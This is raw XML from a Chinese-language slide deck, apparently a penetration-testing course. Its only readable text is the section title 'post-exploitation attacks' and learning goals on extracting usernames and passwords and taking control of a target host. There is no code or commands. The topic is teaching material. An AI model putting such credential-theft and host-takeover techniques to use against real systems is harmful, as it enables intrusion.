            <p:nvGrpSpPr>
              <p:cNvPr id="87" name="Group 27"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="5960997" y="2484779"/>
                <a:ext cx="1304471" cy="2341845"/>
                <a:chOff x="5960997" y="2484779"/>
                <a:chExt cx="1304471" cy="2341845"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="88" name="Group 29"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks noChangeAspect="1"/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="5960997" y="2484779"/>
                  <a:ext cx="1304471" cy="1802479"/>
                  <a:chOff x="3149600" y="2480384"/>
                  <a:chExt cx="1201204" cy="1660005"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="89" name="等腰三角形 51"/>
                  <p:cNvSpPr/>
                  <p:nvPr>
                    <p:custDataLst>
                      <p:tags r:id="rId6"/>
                    </p:custDataLst>
                  </p:nvPr>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm flipV="1">
                    <a:off x="3149600" y="3200883"/>
                    <a:ext cx="1201204" cy="939506"/>
                  </a:xfrm>
                  <a:prstGeom prst="triangle">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:gradFill>
                    <a:gsLst>
                      <a:gs pos="0">
                        <a:schemeClr val="accent3"/>
                      </a:gs>
                      <a:gs pos="100000">
                        <a:srgbClr val="EEECE1">
                          <a:lumMod val="90000"/>
                          <a:alpha val="0"/>
                        </a:srgbClr>
                      </a:gs>
                    </a:gsLst>
                    <a:lin ang="5400000" scaled="0"/>
                  </a:gradFill>
                  <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
                    <a:noFill/>
                    <a:prstDash val="solid"/>
                  </a:ln>
                  <a:effectLst/>
                </p:spPr>
                <p:txBody>
                  <a:bodyPr anchor="ctr"/>
                  <a:lstStyle/>
                  <a:p>
                    <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                      <a:spcBef>
                        <a:spcPts val="0"/>
                      </a:spcBef>
                      <a:spcAft>
                        <a:spcPts val="0"/>
                      </a:spcAft>
                      <a:defRPr/>
                    </a:pPr>
                    <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                      <a:solidFill>
                        <a:sysClr val="window" lastClr="FFFFFF"/>
                      </a:solidFill>
                      <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                      <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="90" name="矩形 52"/>
                  <p:cNvSpPr/>
                  <p:nvPr>
                    <p:custDataLst>
                      <p:tags r:id="rId7"/>
                    </p:custDataLst>
                  </p:nvPr>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm>
                    <a:off x="3630724" y="2480384"/>
                    <a:ext cx="720080" cy="720080"/>
                  </a:xfrm>
                  <a:prstGeom prst="rect">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:solidFill>
                    <a:schemeClr val="accent3"/>
                  </a:solidFill>
                  <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
                    <a:noFill/>
                    <a:prstDash val="solid"/>
                  </a:ln>
                  <a:effectLst>
                    <a:outerShdw blurRad="40000" dist="23000" dir="5400000" rotWithShape="0">
                      <a:srgbClr val="000000">
                        <a:alpha val="35000"/>
                      </a:srgbClr>
                    </a:outerShdw>
                  </a:effectLst>
                  <a:scene3d>
                    <a:camera prst="isometricOffAxis2Top">
                      <a:rot lat="19390491" lon="18812960" rev="21592509"/>
                    </a:camera>
                    <a:lightRig rig="chilly" dir="t">
                      <a:rot lat="0" lon="0" rev="600000"/>
                    </a:lightRig>
                  </a:scene3d>
                  <a:sp3d extrusionH="666750"/>
                </p:spPr>
                <p:txBody>
                  <a:bodyPr anchor="ctr"/>
                  <a:lstStyle/>
                  <a:p>
                    <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                      <a:spcBef>
                        <a:spcPts val="0"/>
                      </a:spcBef>
                      <a:spcAft>
                        <a:spcPts val="0"/>
                      </a:spcAft>
                      <a:defRPr/>
                    </a:pPr>
                    <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                      <a:solidFill>
                        <a:sysClr val="window" lastClr="FFFFFF"/>
                      </a:solidFill>
                      <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                      <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
            </p:grpSp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="91" name="Oval 30"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr>
                  <p:custDataLst>
                    <p:tags r:id="rId8"/>
                  </p:custDataLst>
                </p:nvPr>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="6312532" y="4240732"/>
                  <a:ext cx="585892" cy="585892"/>
                </a:xfrm>
                <a:prstGeom prst="ellipse">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ln w="3810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id-ID"/>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="92" name="AutoShape 112"/>
              <p:cNvSpPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId9"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6453017" y="4367800"/>
                <a:ext cx="328308" cy="328869"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T1" fmla="*/ 10800 h 21600"/>
                  <a:gd name="T2" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T3" fmla="*/ 10800 h 21600"/>
                  <a:gd name="T4" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T5" fmla="*/ 10800 h 21600"/>
                  <a:gd name="T6" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T7" fmla="*/ 10800 h 21600"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="0">
                    <a:pos x="T0" y="T1"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T2" y="T3"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T4" y="T5"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T6" y="T7"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="0" t="0" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="21020" h="21600">
                    <a:moveTo>
                      <a:pt x="18846" y="7946"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="17740" y="9091"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="17740" y="8939"/>
                      <a:pt x="17758" y="8792"/>
                      <a:pt x="17744" y="8636"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="17629" y="7331"/>
                      <a:pt x="17036" y="6068"/>
                      <a:pt x="16074" y="5080"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15004" y="3980"/>
                      <a:pt x="13585" y="3348"/>
                      <a:pt x="12180" y="3345"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="13268" y="2218"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="13812" y="1659"/>
                      <a:pt x="14572" y="1350"/>
                      <a:pt x="15403" y="1350"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="16460" y="1350"/>
                      <a:pt x="17546" y="1840"/>
                      <a:pt x="18381" y="2696"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19165" y="3500"/>
                      <a:pt x="19631" y="4499"/>
                      <a:pt x="19698" y="5510"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19760" y="6453"/>
                      <a:pt x="19457" y="7317"/>
                      <a:pt x="18846" y="7946"/>
                    </a:cubicBezTo>
                    <a:moveTo>
                      <a:pt x="5828" y="19329"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="5813" y="18424"/>
                      <a:pt x="5454" y="17481"/>
                      <a:pt x="4730" y="16739"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4046" y="16034"/>
                      <a:pt x="3150" y="15628"/>
                      <a:pt x="2257" y="15592"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="2911" y="13157"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="2959" y="12995"/>
                      <a:pt x="3052" y="12835"/>
                      <a:pt x="3168" y="12695"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4485" y="11726"/>
                      <a:pt x="6512" y="12012"/>
                      <a:pt x="7920" y="13460"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9409" y="14990"/>
                      <a:pt x="9639" y="17230"/>
                      <a:pt x="8492" y="18568"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8416" y="18609"/>
                      <a:pt x="8339" y="18648"/>
                      <a:pt x="8256" y="18675"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8256" y="18675"/>
                      <a:pt x="5828" y="19329"/>
                      <a:pt x="5828" y="19329"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="2737" y="20164"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="2665" y="20181"/>
                      <a:pt x="2443" y="20239"/>
                      <a:pt x="2291" y="20249"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1751" y="20244"/>
                      <a:pt x="1313" y="19792"/>
                      <a:pt x="1313" y="19237"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1321" y="19124"/>
                      <a:pt x="1365" y="18929"/>
                      <a:pt x="1380" y="18857"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="2071" y="16283"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="2822" y="16261"/>
                      <a:pt x="3630" y="16562"/>
                      <a:pt x="4265" y="17215"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4911" y="17878"/>
                      <a:pt x="5214" y="18725"/>
                      <a:pt x="5181" y="19504"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5181" y="19504"/>
                      <a:pt x="2737" y="20164"/>
                      <a:pt x="2737" y="20164"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="6888" y="11179"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="6280" y="10927"/>
                      <a:pt x="5642" y="10783"/>
                      <a:pt x="5004" y="10774"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="10063" y="5536"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="10838" y="4759"/>
                      <a:pt x="11966" y="4536"/>
                      <a:pt x="13077" y="4819"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13077" y="4819"/>
                      <a:pt x="6888" y="11179"/>
                      <a:pt x="6888" y="11179"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="9717" y="13672"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="9473" y="13258"/>
                      <a:pt x="9194" y="12859"/>
                      <a:pt x="8848" y="12505"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8447" y="12093"/>
                      <a:pt x="7986" y="11770"/>
                      <a:pt x="7507" y="11498"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="13767" y="5064"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="14259" y="5288"/>
                      <a:pt x="14729" y="5607"/>
                      <a:pt x="15145" y="6035"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15500" y="6398"/>
                      <a:pt x="15775" y="6806"/>
                      <a:pt x="15987" y="7229"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15987" y="7229"/>
                      <a:pt x="9717" y="13672"/>
                      <a:pt x="9717" y="13672"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="10519" y="16061"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="10465" y="15452"/>
                      <a:pt x="10298" y="14854"/>
                      <a:pt x="10047" y="14288"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="16257" y="7906"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="16637" y="9140"/>
                      <a:pt x="16442" y="10429"/>
                      <a:pt x="15610" y="11284"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15604" y="11290"/>
                      <a:pt x="15598" y="11293"/>
                      <a:pt x="15593" y="11298"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="15602" y="11306"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10525" y="16565"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="10527" y="16397"/>
                      <a:pt x="10534" y="16232"/>
                      <a:pt x="10519" y="16061"/>
                    </a:cubicBezTo>
                    <a:moveTo>
                      <a:pt x="19308" y="1741"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="18228" y="632"/>
                      <a:pt x="16805" y="0"/>
                      <a:pt x="15403" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14220" y="0"/>
                      <a:pt x="13131" y="450"/>
                      <a:pt x="12335" y="1266"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="9138" y="4577"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="9129" y="4585"/>
                      <a:pt x="9118" y="4592"/>
                      <a:pt x="9108" y="4602"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9103" y="4608"/>
                      <a:pt x="9100" y="4614"/>
                      <a:pt x="9095" y="4620"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="9096" y="4621"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2310" y="11647"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="1998" y="11966"/>
                      <a:pt x="1771" y="12364"/>
                      <a:pt x="1645" y="12797"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="102" y="18541"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="18557"/>
                      <a:pt x="0" y="19008"/>
                      <a:pt x="0" y="19237"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="20541"/>
                      <a:pt x="1030" y="21599"/>
                      <a:pt x="2302" y="21599"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2554" y="21599"/>
                      <a:pt x="3044" y="21475"/>
                      <a:pt x="3062" y="21473"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="8630" y="19969"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="9054" y="19839"/>
                      <a:pt x="9439" y="19604"/>
                      <a:pt x="9750" y="19283"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="19776" y="8899"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="21600" y="7023"/>
                      <a:pt x="21394" y="3881"/>
                      <a:pt x="19308" y="1741"/>
                    </a:cubicBezTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solid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sp>
          <p:nvSpPr>
            <p:cNvPr id="94" name="Text Placeholder 3"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId10"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="16635" y="6800"/>
              <a:ext cx="1600" cy="484"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr" anchorCtr="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle>
              <a:defPPr>
                <a:defRPr lang="zh-CN"/>
              </a:defPPr>
              <a:lvl1pPr marL="0" indent="0" algn="ctr" defTabSz="1216025">
                <a:spcBef>
                  <a:spcPct val="20000"/>
                </a:spcBef>
                <a:buNone/>
                <a:defRPr sz="2000" b="1" baseline="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="65000"/>
                      <a:lumOff val="35000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:defRPr>
              </a:lvl1pPr>
              <a:lvl2pPr marL="457200" indent="0">
                <a:buNone/>
                <a:defRPr sz="1200"/>
              </a:lvl2pPr>
              <a:lvl3pPr marL="914400" indent="0">
                <a:buNone/>
                <a:defRPr sz="1000"/>
              </a:lvl3pPr>
              <a:lvl4pPr marL="1371600" indent="0">
                <a:buNone/>
                <a:defRPr sz="900"/>
              </a:lvl4pPr>
              <a:lvl5pPr marL="1828800" indent="0">
                <a:buNone/>
                <a:defRPr sz="900"/>
              </a:lvl5pPr>
              <a:lvl6pPr indent="0">
                <a:buNone/>
                <a:defRPr sz="900"/>
              </a:lvl6pPr>
              <a:lvl7pPr indent="0">
                <a:buNone/>
                <a:defRPr sz="900"/>
              </a:lvl7pPr>
              <a:lvl8pPr indent="0">
                <a:buNone/>
                <a:defRPr sz="900"/>
              </a:lvl8pPr>
              <a:lvl9pPr indent="0">
                <a:buNone/>
                <a:defRPr sz="900"/>
              </a:lvl9pPr>
            </a:lstStyle>
            <a:p>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                <a:t>项目评价</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48" name="文本框 47"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4505325" y="1420495"/>
            <a:ext cx="2266950" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:style>
          <a:lnRef idx="2">
            <a:schemeClr val="dk1"/>
          </a:lnRef>
          <a:fillRef idx="1">
            <a:schemeClr val="lt1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="dk1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>学习路径</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="矩形 50"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId11"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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52" name="矩形 51"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId12"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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53" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId13"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="4389755" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.4.6 后渗透攻击</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:random/>
  </p:transition>
  <p:timing>
    <p:tnLst>
      <p:par>
        <p:cTn id="1" dur="indefinite" restart="never" nodeType="tmRoot"/>
      </p:par>
    </p:tnLst>
  </p:timing>
</p:sld>
</file>

<file path=ppt/slides/slide2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p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="标题 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【学习目标】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="9716135" cy="1362075"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>1.掌握挖掘用户名和密码的原理和方法。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>2.掌握在获取目标主机控制权的方法。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="矩形 6"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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8" name="矩形 7"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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9" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
